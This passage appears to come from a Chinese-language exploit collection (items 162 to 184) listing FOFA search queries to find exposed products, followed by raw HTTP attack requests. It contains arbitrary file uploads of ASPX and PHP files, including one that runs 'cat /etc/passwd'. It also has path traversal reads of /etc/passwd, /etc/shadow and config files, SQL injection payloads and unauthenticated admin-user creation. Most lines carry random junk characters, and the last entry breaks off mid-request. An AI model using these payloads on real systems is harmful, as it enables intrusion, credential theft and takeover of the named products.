http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"" Z) @2 U* X1 u7 p& i4 h6 B
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
! R8 d2 W+ L- Q$ J" t- @" _<soap:Body>
; B, x& p% h" q2 q$ N2 g8 e<UploadResume xmlns="http://tempuri.org/">
2 Z% c/ ~) O' x O<ip>1</ip>; B( ?2 ~1 K$ F% i% l
<fileName>../../../../dizxdell.aspx</fileName>
2 o& |+ P. |( \% E<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
! U# B# [$ Q5 R* j<tag>3</tag>6 P" p( A* S$ F
</UploadResume>6 a2 o% E0 F& q4 I: I
</soap:Body>
| n) x% c2 x M" h. L0 n* ?</soap:Envelope>/ ~# [: D* u& \& q2 O
+ x! g$ H& K7 ^- @% w: n3 ~" M2 x; v; q! c$ k) Q, R* e
http://x.x.x.x/dizxdell.aspx9 B' v e: u3 \' O+ H& h- f' j
5 V, @$ c" p' }! T X e) \ p0 M
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
4 k7 O7 \: S* M3 kFOFA: app="和丰山海-数字标牌"
( \! g9 W% c; c7 x6 G$ Y% RPOST /QH.aspx HTTP/1.1
) p: x* C5 W; [- V9 y" Z5 nHost: x.x.x.x
0 G) C3 K; E4 `7 N) rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
8 W! o4 B5 H5 _1 @9 w* V2 LConnection: close; O8 w0 ?; l0 ^
Content-Length: 583
+ a; r" j( C+ _5 m2 N- [Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
9 X' @$ B: s& eAccept-Encoding: gzip
. w- P: n& h" S% m+ c/ P1 Q* Y' e5 h/ n
------WebKitFormBoundaryeegvclmyurlotuey
: n+ Z: J0 s9 i5 ~/ k/ [Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
( c2 f3 K% t! C8 lContent-Type: application/octet-stream
6 r M' O. k @# k% u# m9 d/ K2 r$ {7 h5 B+ } B
<% response.write("ujidwqfuuqjalgkvrpqy") %>
7 M4 b: A X. ] n------WebKitFormBoundaryeegvclmyurlotuey E6 T3 H6 m( [' I& Y
Content-Disposition: form-data; name="action") u- y0 g/ w+ X& `! w
- d, [" x# p, p2 p6 Supload1 [! W" d( W/ Z
------WebKitFormBoundaryeegvclmyurlotuey
) @2 C* y. B8 y8 M6 @Content-Disposition: form-data; name="responderId"
, s% |/ G3 }: |+ d7 [! ]
, a! k& C, ]4 P% OResourceNewResponder, R5 v" \( e! K9 {
------WebKitFormBoundaryeegvclmyurlotuey, X' n0 d( r+ m# E# |
Content-Disposition: form-data; name="remotePath"
- j' F* M. w. |0 P8 \# B/ U. }3 K. j* a$ o8 R1 b" j
/opt/resources
; E9 i% s* U. J: F) q------WebKitFormBoundaryeegvclmyurlotuey--: @# f1 I9 h$ w0 t
! {! S4 y6 Q" s% U
" P* D" u. |) U, H$ n, O) chttp://x.x.x.x/opt/resources/kjuhitjgk.aspx7 \/ B- J$ i# m+ [% l
1 D) _( u/ m B R. S163. 号卡极团分销管理系统 ue_serve.php 任意文件上传7 O7 G7 ?& c7 g, @% g$ t
FOFA: icon_hash="-795291075"# U9 \7 Y7 r9 x$ U0 D1 H: A
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.18 X% F6 M& G: f, {+ M0 @
Host: x.x.x.x. j% V- i, s# v+ P1 Z9 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
. Z5 Z6 A2 V$ @: ]: j. l& ZConnection: close
- c( ~; T' C# J' ?$ t" PContent-Length: 2936 q' X; Z; y! G
Accept: */*! U. }7 `9 i) o
Accept-Encoding: gzip, deflate
% B( d+ D$ ? ]Accept-Language: zh-CN,zh;q=0.9
9 ?2 e. t- |5 c) f+ M4 Z, J L1 R9 jContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
5 z6 X0 q% o$ Y& ?' q7 I" f: `
" x) R8 q4 Z* t, N* U3 M------iiqvnofupvhdyrcoqyuujyetjvqgocod! ], f. _. K: E4 v! b
Content-Disposition: form-data; name="name"
! x: x& R1 T) B9 e1 Z! z3 ]5 [
+ l$ o$ _. O3 Z' q. H1.php
% I0 {$ p' t& A' z* E------iiqvnofupvhdyrcoqyuujyetjvqgocod6 i( r$ B9 l% R1 |9 \' ~
Content-Disposition: form-data; name="upfile"; filename="1.php"
( ], ^' F- O$ L( i; M& yContent-Type: image/jpeg, ?- g8 W8 v; @! h
% u2 X% b8 }7 ~8 J
rvjhvbhwwuooyiioxega
0 C5 w8 }5 v2 l7 B% e* m------iiqvnofupvhdyrcoqyuujyetjvqgocod--
0 M" R, j; C! B5 r0 X; u
# c8 X% F a, M4 s$ M" c: l; T3 P7 e4 Q! W
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传# U6 y' d- F' V3 Z3 F; {# a/ I Z5 N
FOFA: title="智慧综合管理平台登入"2 O. p5 a$ R% w( K: g( Q
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
5 W/ N* k( Y0 Z: A3 I: _Host: x.x.x.x! P: G! e* D$ F# w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
0 S, V/ k8 x* G2 p7 L" N& y/ z3 LContent-Length: 2886 g+ V6 L' M1 i Z, M$ D/ @- l
Accept: application/json, text/javascript, */*; q=0.01. \2 }! P; h& T/ q$ N, v; m2 U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,$ X3 C, g9 e- L) o1 {) D
Connection: close4 @$ l1 d4 U9 |
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
1 E3 D I; d: q& ]/ j4 oX-Requested-With: XMLHttpRequest
% j4 L' K+ o$ j& P3 o8 G, r3 L1 BAccept-Encoding: gzip
& h4 E2 {3 |1 j6 [9 I: Y; Y8 U/ G5 g
' l6 A7 h( B( ^0 p) Z! k: f------dqdaieopnozbkapjacdbdthlvtlyl' n: F% W, d; l8 J1 ~% q4 N. T3 n' K
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx". V9 v9 j! ? {3 z1 ~: w
Content-Type: image/jpeg
* `' q1 G# Y7 B4 ?( N/ g
& F; u2 y( f- {) M7 }1 i. Y<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%># C d0 H& j& K
------dqdaieopnozbkapjacdbdthlvtlyl--
9 M, Z& ? h1 Z2 H% G9 h* `- x Y1 W, f8 J$ C& Z% I
7 J2 \, O) e5 Q. Y# k7 W+ mhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx4 o: `) z) ^- T
9 P: b. w/ O( S- K5 q. O165. OrangeHRM 3.3.3 SQL 注入5 l+ X2 T0 S2 u `& V
CVE-2024-36428% D; V* |( y, o8 g3 i+ e& l
FOFA: app="OrangeHRM-产品". g$ u& o) B0 d, ]7 W; x. R! P
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
7 v1 w; `( k" W8 V. s) B) y8 q( R5 V; Q: X: v6 s
& P7 T8 k' @* u# s6 @7 ~2 A166. 中成科信票务管理平台SeatMapHandler SQL注入( U$ b( g. r) ~+ y6 d' C" _; X; ?
FOFA:body="技术支持:北京中成科信科技发展有限公司"
; [% R$ g8 p- V% |: B3 VPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1 o" {2 c, ?% ]0 _$ X7 m
Host:% G3 Q' Z% E- P: N9 f6 Z7 _' e
Pragma: no-cache1 r9 `, ~6 e" B
Cache-Control: no-cache. y3 I' N; n' O* I R" @
Upgrade-Insecure-Requests: 1
9 i! y; t, i# F3 u+ v' k) F8 WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36$ G0 M& B; L! r* [* N6 p! x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 r8 h* {( l+ P# @# N M2 `" L
Accept-Encoding: gzip, deflate( Z. K3 ?8 U, T X7 J
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
" y( [5 r0 B% w0 TCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
! j* L4 {! [6 p$ y9 z, @( F) g GConnection: close, @8 o/ R. B( L0 `$ e
Content-Type: application/x-www-form-urlencoded
! c& W" L/ S) Y- hContent-Length: 892 a, _4 v3 ~! l
" ]- N0 c) u' [. w" {Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE& ^" C! Z% y4 {
9 K+ u/ Q3 x6 O# U
! s. E8 y/ M& U9 N* b8 y167. 精益价值管理系统 DownLoad.aspx任意文件读取: ^ h% V; ?+ c7 r: p
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"+ t) F; L- s+ R3 D3 S. a R9 l
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
5 A/ u2 `* m( l+ R }7 JHost:, e- p# y& g! I1 q: p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 `, x7 J' I' |5 S: kContent-Type: application/x-www-form-urlencoded
% N0 _/ n6 f& r4 n; z! l6 Q: sAccept-Encoding: gzip, deflate" [9 b/ O n: I! o: P- k3 |
Accept: */*
" ?5 i# |8 h( w! z3 x- j( yConnection: keep-alive
/ }- w2 w7 e' q% B4 D# M8 i. `0 k& d; _, Y* \6 V: O* n
( H6 U. h" m* Z' G; P# L
168. 宏景EHR OutputCode 任意文件读取
# g4 ^1 D7 B# d3 g* }2 zFOFA:app="HJSOFT-HCM"; n1 r* C( W- s3 q) \/ F; I' E
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
7 o q; `9 _: G3 W. d$ q/ [Host: your-ip! i% E5 i, v5 [, C4 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36$ K5 |7 u8 ~+ U( P* T' U* q
Content-Type: application/x-www-form-urlencoded+ ~4 q! E5 j: \
Connection: close
& d8 d- q$ N2 ]5 J( x1 a/ {" E% W& x$ ~/ o4 [5 S. C$ W/ y0 C
* N9 Q/ A* @" X* x6 ~% l& z
( N( K3 h' t! T, J1 R' O
169. 宏景EHR downlawbase SQL注入3 n6 ^: }, _, c/ r* {% B
FOFA:app="HJSOFT-HCM"
8 p1 r; g" a: f9 ^3 y* }GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
$ Y4 d- D* u- m* RHost: your-ip8 C6 b8 C! e8 [ h+ W& T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 V& X0 }9 ?( _, z2 m$ W6 E, x( W
Accept: */*# M' p9 q9 F9 N: u4 F
Accept-Encoding: gzip, deflate# |8 r5 L& y7 w2 G
Connection: close# }0 j3 N0 D* l, W$ \: X4 [" k8 |
7 V+ e1 Q" k* m7 u8 p1 [: b+ ]2 `9 I; t- }5 g
' v9 n$ Q( T; ~& @5 a* Z
170. 宏景EHR DisplayExcelCustomReport 任意文件读取6 E2 ]8 _& ]; ?
FOFA:body="/general/sys/hjaxmanage.js"3 z9 g6 u5 s( w( H3 i/ _, q& u
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.19 ^/ [+ ?* S* s% ^; B& O
Host: balalanengliang
* ^3 j; @) r& {: q2 D2 _ mUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 |: t# ]( \" y1 P$ S
Content-Type: application/x-www-form-urlencoded
5 T& c Q7 ^& A9 i* C7 g1 \. L
, ~( p9 x9 |. _0 ^9 V0 hfilename=../webapps/ROOT/WEB-INF/web.xml
p& j) d! i% o+ B8 B% f+ X
9 w R, b) T6 h9 n8 h$ G* S$ w: a; Z+ O/ ?! m9 u- S0 I% g& W
171. 通天星CMSV6车载定位监控平台 SQL注入! g% Q9 k9 I7 V$ ] ~9 \; T
FOFA:body="/808gps/"0 v; H9 x- @4 s" G5 m
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
# _- a: _: U6 X: [" D- q' jHost: your-ip
& t& J8 d) Y4 ?- z" \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.00 u3 y9 a1 `3 ^) p8 r! R
Accept: */*$ y! |: _ {$ W- [3 Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 a% x7 O* Q& ^5 RAccept-Encoding: gzip, deflate
; X/ t: q7 X5 `) g& X% pConnection: close8 ]! o! G' l, n
9 x) `, c# `4 ~& z
. _4 R4 e: R/ R/ g8 h9 B9 |7 o, T
, |- k+ F( x# d% f: ~8 o; ]7 j7 N172. DT-高清车牌识别摄像机任意文件读取
$ l; U8 Z% g$ o. Z6 ?# eFOFA:app="DT-高清车牌识别摄像机"# M' h6 F/ S! }# {
GET /../../../../etc/passwd HTTP/1.1
- D, h# x" D/ {0 [Host: your-ip
: S$ ?/ G& q) Y! O+ w! s' G- k/ I1 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( Y C. c( L6 n0 t6 n1 oAccept-Encoding: gzip, deflate# O6 e+ G/ e% f5 q
Accept: */*0 Y, t. N2 u% \0 a% ~
Connection: keep-alive
$ E. h8 v c0 n) T1 s
1 \: E1 Q! g! F- U+ V+ c' b. J$ Z' J7 e0 q& w! g* p* w2 m7 A
3 E4 n) Y& o: p& k
173. Check Point 安全网关任意文件读取
1 t5 o- g0 B' fCVE-2024-24919
: u" Y7 P# g+ S8 S e2 dFOFA:app="Check_Point-SSL-Network-Extender"
5 k/ m( v+ l3 k2 H6 ZPOST /clients/MyCRL HTTP/1.1" d. }$ Q( s+ P1 n N
Host: your-ip2 A4 n5 c/ Y5 i3 ?1 B# F+ e
Content-Type: application/x-www-form-urlencoded
/ `9 n' W( L+ u' |$ Q% O6 B. J: q. f
aCSHELL/../../../../../../../etc/shadow
5 e2 P3 I5 I( \& h6 Q% U/ Z' ^ k
' h# x' @% \$ E: u I) n. M. r6 t+ r( d: I0 E% x- v
+ M8 ]" c$ {! X- ^174. 金和OA C6 FileDownLoad.aspx 任意文件读取" `5 {) i6 f" h" V; v% B0 _
FOFA:app="金和网络-金和OA"+ L* y2 W6 z3 K
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
& j5 h( g$ N* Q P( H/ e* kHost: your-ip1 j9 E2 w# U3 l6 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 P: o4 ^7 d; i- x1 U- }& }6 I3 [0 r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ T J, ` t5 l/ P7 UAccept-Encoding: gzip, deflate, br
% y% k4 q( r. q/ j: w fAccept-Language: zh-CN,zh;q=0.9
7 h5 D9 _( a. q5 AConnection: close7 t# ~( X, R4 {/ l
" i1 w, W' E1 }! E# |
$ x( z7 |# Q: G8 ~
- x' A- |' E7 W# f+ W! f, z! [
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入0 S2 A+ ^* G- c6 a
FOFA:app="金和网络-金和OA"! M) [( t1 C* I) t/ G
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.14 ^$ `" f g! Y- f/ f T" E
Host:
3 A5 V. F$ P9 r" zUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.369 U% m; o+ t9 ?- s; L% k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" V9 g) q+ @% Y' x2 n2 _/ F. A) \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 c+ c! ?1 H% v' }2 H5 h8 y
Accept-Encoding: gzip, deflate& ^7 n% z K" d$ d0 A! r6 ?0 N
Connection: close
7 o& L* Y# X, l# b% s fUpgrade-Insecure-Requests: 1: i$ f! j* w& n T( y
}( t9 U' J; b* u1 V
8 L$ R+ F3 B- [8 z176. 电信网关配置管理系统 rewrite.php 文件上传
, g2 `' u# D8 G! Q4 z5 J- d. H) KFOFA:body="img/login_bg3.png" && body="系统登录"3 b1 p6 f' U" r8 C9 C. h* ?% o- ?1 g o. Q
POST /manager/teletext/material/rewrite.php HTTP/1.1
; k; E. G- u# C6 D9 l# H8 r( iHost: your-ip# }3 K+ ]. K$ g @5 H; D g9 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.07 W3 `" D' n* g8 p% h" G% p8 V2 e
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
2 x! ^& X5 p; E1 gConnection: close
! b! g8 d' @9 f0 F6 Y; j* H1 \2 b9 x* x1 n
------WebKitFormBoundaryOKldnDPT
0 r/ a! v0 _' h+ h1 r; f: w2 xContent-Disposition: form-data; name="tmp_name"; filename="test.php"
4 |, R; B, o: W$ a1 C$ [& \7 E2 mContent-Type: image/png5 t( H* E8 b! I# M; ^0 O A
/ H" N5 u. M+ U5 Q( U
<?php system("cat /etc/passwd");unlink(__FILE__);?>
+ x( j2 @( e9 U u3 _8 ~------WebKitFormBoundaryOKldnDPT
) j4 N8 F/ r' j0 {6 ^0 ]Content-Disposition: form-data; name="uploadtime"/ m# l5 c* y1 p, R; U# `
) z: `4 ^$ y& O/ c; Z% } M . h) q9 w! @. y' }# Y A, \
------WebKitFormBoundaryOKldnDPT-- {5 }: `) ^# c7 J- Q& h
* \" t$ G/ o5 O: x6 X3 l" [$ T- f; V% m
" ~4 q L# H- K$ m4 B1 s$ W! E
177. H3C路由器敏感信息泄露1 j4 W8 \+ R7 `! B: [
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg( M: D- T9 A) k7 k) g9 H
/userLogin.asp/../actionpolicy_status/../M60.cfg) [- p( B3 v1 @% r# d
/userLogin.asp/../actionpolicy_status/../GR8300.cfg4 }# _, l z) X; c6 h% p
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
; b7 w+ @" g Y0 U, e' P/userLogin.asp/../actionpolicy_status/../GR3200.cfg
4 G4 F; w6 ^+ q n' J, r4 a/userLogin.asp/../actionpolicy_status/../GR2200.cfg G, g2 P8 `; c1 m& E& F, A
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg y& G% {4 ?, K! ~* w( K _7 k2 V* l
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg8 h) Z8 V5 B; A, X- G, i7 X6 o5 v
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg7 T& }5 T0 H0 j' W' x( J
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
9 |6 F! h5 m& R$ U9 D/userLogin.asp/../actionpolicy_status/../ER5200.cfg
7 V4 U& [" L5 q; d8 s8 @5 k/userLogin.asp/../actionpolicy_status/../ER5100.cfg
$ U- i9 Y2 V5 Z/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg( c7 z" i. M2 G
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
2 \$ y" G# Q9 Y/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg6 Y. A" X) `2 b7 `$ s8 [2 g7 r
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
& w; {- D0 N# Z0 g; x5 D/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
( _5 a0 e" j& n/userLogin.asp/../actionpolicy_status/../ER3108G.cfg# y6 ~" \: u: [
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg& V# M3 B; Y1 X
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
9 a7 j9 Z8 ?( q0 m3 Z+ A; a5 z6 w/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
# H$ I, R) p$ c
' y5 a: {/ K* X8 @- `) K7 e; @6 k! ~( K6 v# N
178. H3C校园网自助服务系统-flexfileupload-任意文件上传& D% w5 v, h* H$ r# A5 U
FOFA:header="/selfservice"3 S! N& m$ _; \* }3 e
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
1 ^5 t A, K' ~! H3 I( W9 CHost:
V& B+ N+ W- m" o0 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
6 ^) J" U% s. `2 d/ l% {( rContent-Length: 252
7 C. N; k+ p; d6 M9 \Accept-Encoding: gzip, deflate0 I% H' b |; b8 G' |) T
Connection: close
, K+ C% v6 d) \% ]: V% F& r* u; V9 KContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
% |: U/ R* a' A' i& l9 F O" x-----------------aqutkea7vvanpqy3rh2l
' f0 o2 t2 C" o2 S) v& f2 F* U' G+ lContent-Disposition: form-data; name="12234.txt"; filename="12234"
" \' {3 w+ n3 ~$ {Content-Type: application/octet-stream
9 p" v* u) R `$ UContent-Length: 255# B7 [8 q" |2 |8 m1 h9 r, K
# T8 d$ o7 j' Z6 `( ?* f122342 n# [' E; @) r3 e" p
-----------------aqutkea7vvanpqy3rh2l--& I- J! k0 A' i; D& n6 S* U7 a' y
3 q& o" O- z. B* J K% @2 j" t7 `( ^
4 R9 {. H7 D0 X( d! ]GET /imc/primepush/%2e%2e/flex/12234.txt
6 s7 w9 Q) P2 X c( v$ M Z' a
. ?+ O0 d3 H7 X. |" s$ d; a7 {* ]5 S) K; j4 b" x$ U, e0 K
179. 建文工程管理系统存在任意文件读取
, \$ e9 ^7 B" B% m7 h2 |POST /Common/DownLoad2.aspx HTTP/1.1
$ V5 Q' {" D. ?1 {. Y5 FHost: {{Hostname}}
) A% t4 f! ]# X6 ]3 sContent-Type: application/x-www-form-urlencoded
) a' r6 Z7 o0 e7 t# ] CUser-Agent: Mozilla/5.05 y2 I# @. z9 q$ |9 g3 j
% o, E/ G, m, L! e6 w
path=../log4net.config&Name=4 W( N) u$ a7 ^+ z1 m8 T$ D! B
& u7 r% y; K( B3 @; t2 [: S
; @4 a, M; r+ a+ S180. 帮管客 CRM jiliyu SQL注入
0 U# _2 o" q% j. u4 s& j% ~; |- sFOFA:app="帮管客-CRM"* z. Z1 x. R. X- ^9 F) K I
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1& J6 x! r6 l, a
Host: your-ip$ P! J% Z. @8 Z y* \: ^0 q& j6 e% H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
* `2 s4 m, E- T6 m9 u) [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 r, N* X$ {# P9 c# MAccept-Encoding: gzip, deflate# M) ?3 F8 ^1 u( y$ _
Accept-Language: zh-CN,zh;q=0.97 a( A6 K' C9 b
Connection: close# L8 f9 B: Q2 Q- k! x
1 c9 m4 B. O8 k% U" `
2 [7 J9 _$ V' H0 h
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
( K+ Q4 s# S+ v% w. qFOFA:"PDCA/js/_publicCom.js"5 [4 G( s. v; { v2 a! q/ Q
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1 W8 w; J2 p4 q: m1 H& t
Host: your-ip
0 J4 M& \% O2 N$ d. o: C8 @* ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
, T5 a3 T# G' l& U) S# W6 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* ~1 {9 B7 h) x; x/ vAccept-Encoding: gzip, deflate, br
0 F1 x2 x# n$ d- Z1 ?; b* o) nAccept-Language: zh-CN,zh;q=0.9( ?- @3 ?+ [/ B8 [4 ]5 L" d
Connection: close. j- o; k$ ]) r# k( X) L3 g2 K
Content-Type: application/x-www-form-urlencoded8 d3 K' d2 c6 e4 b; \; M
/ e9 O* i$ `0 [, F6 k( m2 _' X
# z' i" ?# N1 Taction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=200 p5 o9 `9 k& R) J6 U
/ N! k G% x2 E* r8 ~! J
0 S) Q% E6 i( C4 O- I7 j182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
) I* N( c9 C* Q5 c: A0 jFOFA:"PDCA/js/_publicCom.js"
3 X# g7 f/ d: ~POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
( }$ Z* ^1 R: F# G: q: I! vHost: your-ip# \4 V r7 |' x4 M1 C1 [: Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+ N! v1 H1 o1 z, c! V% W5 l, hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 q2 n+ M) l$ o6 r: Z ]; L( tAccept-Encoding: gzip, deflate, br
% N V' @, A) U5 SAccept-Language: zh-CN,zh;q=0.9
5 W# n% ~ w V: V7 t/ F' r# LConnection: close
$ q, O0 h% T- }Content-Type: application/x-www-form-urlencoded/ |* D: M! p: r7 y1 ?8 V& q2 _2 d
a9 m3 D' ]) F& U. ^( Q/ c1 Q1 ^. @5 n% L& q( w
username=test1234&pwd=test1234&savedays=1
) ^, W \0 A6 ?/ X. x6 |1 a: d
! D4 a1 f4 d ~/ a4 J# n( v* {0 r( P6 F3 `" ]/ S
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入# |" [' J w, ~! U; [* _
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"& p6 t* T6 l! z, d, w
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1' a# E6 z3 T* ~# M$ E
Host: your-ip M/ {* z8 u& p! b& D/ `
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36+ Z' I8 J" d0 O; w) x
Accept-Charset: utf-8
' m* e& [+ J' z0 d/ oAccept-Encoding: gzip, deflate
# U5 m& J6 J$ ]: U, |5 QConnection: close
, \) v( Z0 V0 h7 s
$ D: d# u3 ?% r5 b2 _( @: ~) T: v$ ]. A# z9 k, _
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
; w4 |3 @% X# z9 UFOFA:server="SunFull-Webs"7 r8 X" P j+ D: ^6 ]( ? I# |, Q
POST /soap/AddUser HTTP/1.1- l1 f3 Z, f2 ^, K4 W
Host: your-ip
+ f% e* L: n h8 y) `Accept-Encoding: gzip, deflate
B3 R1 f5 w) M5 G/ vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0- U+ f) L; q& y$ w, d' ^: L
Accept: application/xml, text/xml, */*; q=0.01
9 _. }% a% v2 Q7 |8 C: G. B- l: yContent-Type: text/xml; charset=utf-8
- w" m% ~# G9 Q% w+ R9 F. AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 D8 {: s7 i+ F) \% `. AX-Requested-With: XMLHttpRequest1 D8 n+ \% F* n( e8 Z
! H" _8 {! |0 R) f# u( Q$ P, F e
